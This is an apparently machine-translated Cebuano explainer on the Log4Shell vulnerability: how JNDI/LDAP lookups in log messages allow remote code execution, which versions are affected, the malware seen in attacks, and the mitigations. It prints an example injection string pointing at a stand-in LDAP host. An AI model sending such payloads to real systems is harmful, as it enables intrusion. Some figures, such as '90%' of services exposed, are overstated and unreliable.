Kaundan[Itago][Ipakita]
Sa ulahing bahin sa Nobyembre 2021, among nadiskobrehan ang dakong hulga sa cybersecurity. Kini nga pagpahimulos mahimo’g makaapekto sa milyon-milyon nga mga sistema sa kompyuter sa tibuuk kalibutan.
Kini usa ka giya sa pagkahuyang sa Log4j ug kung giunsa ang usa ka wala matagad nga sayup sa disenyo nga nahabilin sa 90% sa mga serbisyo sa kompyuter sa kalibutan nga bukas sa pag-atake.
Ang Apache Log4j usa ka open-source nga Java-based logging utility nga gihimo sa Apache Software Foundation. Orihinal nga gisulat ni Ceki Gülcü kaniadtong 2001, kini karon bahin sa Apache Logging Services, usa ka proyekto sa Apache Software Foundation.
Ang mga kompanya sa tibuok kalibutan naggamit sa Log4j library aron makahimo sa pag-log sa ilang mga aplikasyon. Sa tinuud, ang librarya sa Java kay ubiquitous, makit-an nimo kini sa mga aplikasyon gikan sa Amazon, Microsoft, Google, ug uban pa.
Ang pagkaprominente sa librarya nagpasabot nga ang bisan unsang potensyal nga depekto sa code mahimong magbilin sa minilyon nga mga kompyuter nga bukas sa pag-hack. Niadtong Nobyembre 24, 2021, a seguridad sa panganod Ang tigdukiduki nga nagtrabaho sa Alibaba nakadiskobre sa usa ka makalilisang nga sayup.
Ang pagkahuyang sa Log4j, nailhan usab nga Log4Shell, naglungtad nga wala mamatikdi sukad sa 2013. Ang pagkahuyang nagtugot sa mga malisyosong aktor sa pagpadagan sa code sa mga apektadong sistema nga nagpadagan sa Log4j. Gipadayag kini sa publiko kaniadtong Disyembre 9, 2021
Ang mga eksperto sa industriya nagtawag sa Log4Shell flaw nga pinakadako nga kahuyang sa bag-o nga panumduman.
Sa semana pagkahuman sa pagmantala sa pagkahuyang, ang mga cybersecurity team nakamatikod sa milyon-milyon nga mga pag-atake. Ang ubang mga tigdukiduki nakaobserbar pa gani ug kapin sa usa ka gatos nga pag-atake kada minuto.
Unsang paagi kini sa trabaho?
Aron masabtan kung nganong delikado kaayo ang Log4Shell, kinahanglan natong masabtan kung unsa ang mahimo niini.
Ang kahuyangan sa Log4Shell nagtugot alang sa arbitraryong pagpatuman sa code, nga sa panguna nagpasabut nga ang usa ka tig-atake mahimong magpadagan sa bisan unsang command o code sa usa ka target nga makina.
Giunsa kini paghimo niini?
Una, kinahanglan natong masabtan kung unsa ang JNDI.
Ang Java Naming and Directory Interface (JNDI) usa ka serbisyo sa Java nga nagtugot sa mga programa sa Java sa pagdiskobre ug pagpangita sa mga datos ug mga kapanguhaan pinaagi sa usa ka ngalan. Kini nga mga serbisyo sa direktoryo hinungdanon tungod kay naghatag kini usa ka organisado nga set sa mga rekord alang sa mga developer nga dali nga maghisgot kung maghimo mga aplikasyon.
Ang JNDI makagamit ug lain-laing mga protocol aron ma-access ang usa ka direktoryo. Usa niini nga mga protocol mao ang Lightweight Directory Access Protocol, o LDAP.
Sa pag-log sa usa ka string, log4j naghimo sa mga pag-ilis sa hilo kung makasugat sila og mga ekspresyon sa porma ${prefix:name}
.
Pananglitan, Text: ${java:version}
mahimong ma-log ingon Text: Java nga bersyon 1.8.0_65. Kini nga mga matang sa mga pagpuli kasagaran.
Mahimo usab kita adunay mga ekspresyon sama sa Text: ${jndi:ldap://example.com/file}
nga naggamit sa JNDI nga sistema sa pagkarga sa Java object gikan sa URL pinaagi sa LDAP protocol.
Kini epektibo nga nagkarga sa datos nga gikan sa kana nga URL sa makina. Ang bisan unsang potensyal nga hacker mahimong mag-host sa malisyoso nga code sa usa ka publiko nga URL ug maghulat sa mga makina nga naggamit sa Log4j aron ma-log kini.
Tungod kay ang mga sulod sa mga mensahe sa log adunay mga datos nga kontrolado sa tiggamit, ang mga hacker mahimong magsulud sa ilang kaugalingon nga mga pakisayran sa JNDI nga nagpunting sa mga server sa LDAP nga ilang gikontrol. Kini nga mga server sa LDAP mahimong puno sa malisyosong Java nga mga butang nga mahimo sa JNDI pinaagi sa pagkahuyang.
Ang nakapasamot niini mao nga dili igsapayan kung ang aplikasyon usa ka server-side o aplikasyon sa kilid sa kliyente.
Hangtud nga adunay usa ka paagi alang sa logger nga mabasa ang malisyosong code sa tig-atake, ang aplikasyon bukas gihapon sa pagpahimulos.
Kinsa ang apektado?
Ang pagkahuyang makaapekto sa tanan nga mga sistema ug serbisyo nga naggamit sa APache Log4j, nga adunay mga bersyon 2.0 hangtod ug lakip ang 2.14.1.
Daghang mga eksperto sa seguridad nagtambag nga ang pagkahuyang mahimong makaapekto sa daghang mga aplikasyon gamit ang Java.
Ang sayup unang nadiskobrehan sa Minecraft nga video game nga gipanag-iya sa Microsoft. Giawhag sa Microsoft ang ilang mga tiggamit sa pag-upgrade sa ilang Java nga edisyon nga Minecraft software aron malikayan ang bisan unsang peligro.
Si Jen Easterly, ang Direktor sa Cybersecurity and Infrastructure Security Agency (CISA) nag-ingon nga ang mga vendor adunay dakong responsibilidad aron mapugngan ang mga end user gikan sa mga malisyosong aktor nga nagpahimulos niini nga pagkahuyang.
"Ang mga vendor kinahanglan usab nga makigkomunikar sa ilang mga kustomer aron masiguro nga ang mga end-user nahibal-an nga ang ilang produkto adunay kini nga kahuyangan ug kinahanglan unahon ang mga update sa software."
Ang mga pag-atake gikataho nga nagsugod na. Ang Symantec, usa ka kompanya nga naghatag software sa cybersecurity, nakaobserbar sa lainlaing gidaghanon sa mga hangyo sa pag-atake.
Ania ang pipila ka mga pananglitan sa mga matang sa mga pag-atake nga nakita sa mga tigdukiduki:
- botnets
Ang mga botnet usa ka network sa mga kompyuter nga naa sa kontrol sa usa ka partido nga nag-atake. Nagtabang sila sa paghimo sa mga pag-atake sa DDoS, pagpangawat sa datos, ug uban pang mga scam. Naobserbahan sa mga tigdukiduki ang Muhstik botnet sa mga script sa shell nga gi-download gikan sa Log4j exploit.
- XMRig Miner Trojan
Ang XMRig usa ka open-source nga cryptocurrency nga minero nga naggamit sa mga CPU sa pagmina sa Monero token. Mahimong i-install sa mga cybercriminal ang XMRig sa mga aparato sa mga tawo aron magamit nila ang ilang gahum sa pagproseso nga wala sila kahibalo.
- Khonsari Ransomware
Ang Ransomware nagtumong sa usa ka porma sa malware nga gidisenyo aron pag-encrypt sa mga file sa kompyuter. Ang mga tig-atake mahimong mangayo ug bayad baylo sa paghatag og access balik sa mga naka-encrypt nga mga file. Nadiskobrehan sa mga tigdukiduki ang Khonsari ransomware sa mga pag-atake sa Log4Shell. Gitarget nila ang mga Windows server ug gigamit ang .NET framework.
Unsay sunod nga nahitabo?
Gitagna sa mga eksperto nga mahimo’g daghang bulan o tingali bisan mga tuig aron hingpit nga matul-id ang kagubot nga gipahinabo sa pagkahuyang sa Log4J.
Kini nga proseso naglakip sa pag-update sa matag apektadong sistema nga adunay patched nga bersyon. Bisan kung ang tanan nga kini nga mga sistema gitambalan, naa gihapon ang nag-ung-ong nga hulga sa posible nga mga backdoor nga mahimo’g gidugang sa mga hacker sa bintana nga ang mga server bukas alang sa pag-atake.
Daghan ang mga solusyon ug pagpagaan anaa aron mapugngan ang mga aplikasyon nga mapahimuslan niini nga bug. Ang bag-ong Log4j nga bersyon 2.15.0-rc1 nagbag-o sa lainlaing mga setting aron maminusan kini nga pagkahuyang.
Ang tanan nga mga bahin gamit ang JNDI ma-disable pinaagi sa default ug ang layo nga pagpangita gipugngan usab. Ang pag-disable sa feature sa pagpangita sa imong Log4j setup makatabang sa pagpakunhod sa risgo sa posibleng pagpahimulos.
Sa gawas sa Log4j, kinahanglan gihapon ang usa ka mas lapad nga plano aron mapugngan ang mga pagpahimulos sa bukas nga gigikanan.
Sa sayo pa sa Mayo, ang White House nagpagawas sa usa ka executive order nga nagtumong sa pagpalambo sa nasudnong cybersecurity. Naglakip kini sa usa ka probisyon alang sa usa ka software bill of materials (SBOM) nga usa ka pormal nga dokumento nga adunay usa ka lista sa matag butang nga gikinahanglan sa paghimo sa aplikasyon.
Naglakip kini sa mga bahin sama sa Bukas nga tinubdan mga pakete, dependency, ug mga API nga gigamit alang sa kalamboan. Bisan kung ang ideya sa mga SBOM makatabang alang sa transparency, makatabang ba gyud kini sa konsumedor?
Ang pag-upgrade sa mga dependency mahimong sobra ka hasol. Ang mga kompanya mahimo ra nga mopili sa pagbayad sa bisan unsang mga multa kaysa peligro nga mag-usik og dugang nga oras sa pagpangita og mga alternatibong pakete. Tingali kini nga mga SBOM magamit lamang kung ang ilang gilangkuban limitado pa.
Panapos
Ang isyu sa Log4j labaw pa sa usa ka teknikal nga problema alang sa mga organisasyon.
Ang mga lider sa negosyo kinahanglan nga nahibal-an ang mga potensyal nga peligro nga mahimong mahitabo kung ang ilang mga server, produkto, o serbisyo nagsalig sa code nga wala nila gipadayon.
Ang pagsalig sa open-source ug third party nga mga aplikasyon kanunay adunay pipila ka risgo. Kinahanglang hunahunaon sa mga kompanya ang pagtrabaho sa mga estratehiya sa pagpaminus sa peligro sa wala pa mahayag ang mga bag-ong hulga.
Kadaghanan sa web nagsalig sa open-source software nga gimintinar sa liboan ka mga boluntaryo sa tibuok kalibutan.
Kung gusto namon nga itago ang web nga usa ka luwas nga lugar, ang mga gobyerno ug mga korporasyon kinahanglan nga mamuhunan sa pagpondo sa mga paningkamot sa open source ug mga ahensya sa cybersecurity sama sa CISA.
Leave sa usa ka Reply